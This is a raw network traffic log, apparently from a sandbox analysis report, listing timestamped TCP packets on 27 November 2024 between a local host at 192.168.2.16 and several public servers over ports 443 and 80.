                                                                                          Nov 27, 2024 15:14:47.842580080 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.842590094 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.842607975 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.842648029 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.842669964 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.842695951 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.842721939 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.842751026 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.863116026 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.863204956 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.863214016 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.863269091 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.863382101 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.863398075 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:47.863409996 CET49715443192.168.2.1652.149.20.212
                                                                                          Nov 27, 2024 15:14:47.863415003 CET4434971552.149.20.212192.168.2.16
                                                                                          Nov 27, 2024 15:14:48.011487007 CET4968080192.168.2.16192.229.211.108
                                                                                          Nov 27, 2024 15:14:50.419502020 CET4968080192.168.2.16192.229.211.108
                                                                                          Nov 27, 2024 15:14:50.771500111 CET49678443192.168.2.1620.189.173.10
                                                                                          Nov 27, 2024 15:14:52.210529089 CET49673443192.168.2.16204.79.197.203
                                                                                          Nov 27, 2024 15:14:55.229540110 CET4968080192.168.2.16192.229.211.108
                                                                                          Nov 27, 2024 15:14:56.440011024 CET44349714142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:14:56.440092087 CET44349714142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:14:56.440257072 CET49714443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:14:56.476293087 CET49714443192.168.2.16142.250.181.100
                                                                                          Nov 27, 2024 15:14:56.476311922 CET44349714142.250.181.100192.168.2.16
                                                                                          Nov 27, 2024 15:15:00.372616053 CET49678443192.168.2.1620.189.173.10
                                                                                          Nov 27, 2024 15:15:01.314773083 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.314826965 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:01.314918041 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.315329075 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.315372944 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:01.315449953 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.315726042 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.315742016 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:01.316009998 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:01.316024065 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.580041885 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.580369949 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.580390930 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.581424952 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.581499100 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.582773924 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.582809925 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.582834959 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.582902908 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.582915068 CET44349721104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.582922935 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.582967997 CET49721443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.583323002 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.583378077 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.583451986 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.583709002 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.583729029 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.621732950 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.622021914 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.622051954 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.623070955 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.623147011 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623425007 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623445988 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623483896 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623497009 CET44349720104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.623558044 CET49720443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623773098 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.623811960 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:02.623891115 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.624135017 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:02.624145985 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.887691975 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.888185978 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.888211012 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.889204979 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.889295101 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.889966965 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.890279055 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.890317917 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.890429974 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.890490055 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.890667915 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.890680075 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.891288996 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.891352892 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.891624928 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.891674042 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.932625055 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.933307886 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:03.933330059 CET44349722104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:03.980619907 CET49722443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.766278982 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.767225981 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.767262936 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.767323017 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.767330885 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.767343044 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.767405033 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.775715113 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.775804043 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.775816917 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.792073011 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.792114973 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.792131901 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.792140961 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.792180061 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.844619989 CET4968080192.168.2.16192.229.211.108
                                                                                          Nov 27, 2024 15:15:04.888540983 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.940679073 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.940705061 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.973864079 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.973907948 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.973963022 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.973988056 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.974035025 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.982013941 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.982129097 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:04.982187033 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.982431889 CET49723443192.168.2.16104.21.52.130
                                                                                          Nov 27, 2024 15:15:04.982448101 CET44349723104.21.52.130192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.156725883 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:05.156783104 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.156861067 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:05.157077074 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:05.157099009 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.157776117 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:05.157814026 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.157871008 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:05.158020020 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:05.158035040 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.159560919 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:05.159595013 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:05.159671068 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:05.159890890 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:05.159903049 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.383724928 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.384107113 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.384147882 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.385138988 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.385227919 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.386240959 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.386301994 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.386430025 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.386439085 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.426645994 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.428066969 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.429169893 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.429202080 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.430169106 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.430244923 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.431298971 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.431375980 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.431514025 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.431526899 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.436217070 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.436427116 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:06.436491966 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.437499046 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.437606096 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:06.438469887 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:06.438539982 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.438636065 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:06.438654900 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.478239059 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.478266001 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:06.951272964 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.951369047 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.951404095 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.951510906 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.951581955 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.951582909 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.951659918 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.963012934 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.963115931 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.963135004 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.967736959 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.967814922 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.967829943 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.967952013 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.968023062 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.968075037 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.968369961 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.968394995 CET44349726104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.968406916 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.968446970 CET49726443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.969872952 CET49727443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.969922066 CET44349727104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.970000029 CET49727443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.970240116 CET49727443192.168.2.16104.18.94.41
                                                                                          Nov 27, 2024 15:15:06.970251083 CET44349727104.18.94.41192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.976439953 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:06.976553917 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:06.976576090 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.017743111 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.071412086 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.092168093 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.092212915 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.092240095 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.092417002 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.092489004 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.092554092 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.093578100 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.102324963 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.102408886 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.102427959 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.110779047 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.110847950 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.110866070 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.113706112 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.113729954 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.152977943 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.153048038 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.153078079 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.156419992 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.156467915 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.156481981 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.161623001 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.170706034 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.170756102 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.170782089 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.170799017 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.170840979 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.177990913 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.185251951 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.185302973 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.185324907 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.192478895 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.192537069 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.192553997 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.199852943 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.199908972 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.199923038 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.207088947 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.207149029 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.207163095 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.213120937 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.213212967 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.213243008 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.213258028 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.217382908 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.217446089 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.217453957 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.217466116 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.217510939 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.225028992 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.225091934 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.225110054 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.225121021 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.225182056 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.231045008 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.237061024 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.237126112 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.237159014 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.265414000 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.265479088 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.265491962 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.293586016 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.297702074 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.297768116 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.297817945 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.305635929 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.305665016 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.306026936 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.306107998 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.306140900 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.313926935 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.313996077 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.314019918 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.330113888 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.330188036 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.330224037 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.330238104 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.330281019 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.338280916 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.346486092 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.346549034 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.346571922 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.346599102 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.346661091 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.353662968 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.353707075 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.354613066 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.355942011 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.356012106 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.356031895 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.360742092 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.360831022 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.360902071 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.362199068 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.362265110 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.362288952 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.366998911 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.367063999 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.367080927 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.367110968 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.367181063 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.367203951 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.373511076 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.373585939 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.373603106 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.379889011 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.379957914 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.379975080 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.385746002 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.385814905 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.385831118 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.385853052 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.385910034 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.386126041 CET49725443192.168.2.16104.17.24.14
                                                                                          Nov 27, 2024 15:15:07.386162043 CET44349725104.17.24.14192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397691011 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397701979 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397727966 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397744894 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397753000 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397758007 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.397813082 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397850990 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.397850037 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.397880077 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.414850950 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.414865017 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.414881945 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.414944887 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.414974928 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.414997101 CET44349724151.101.66.137192.168.2.16
                                                                                          Nov 27, 2024 15:15:07.414999962 CET49724443192.168.2.16151.101.66.137
                                                                                          Nov 27, 2024 15:15:07.415060997 CET49724443192.168.2.16151.101.66.137
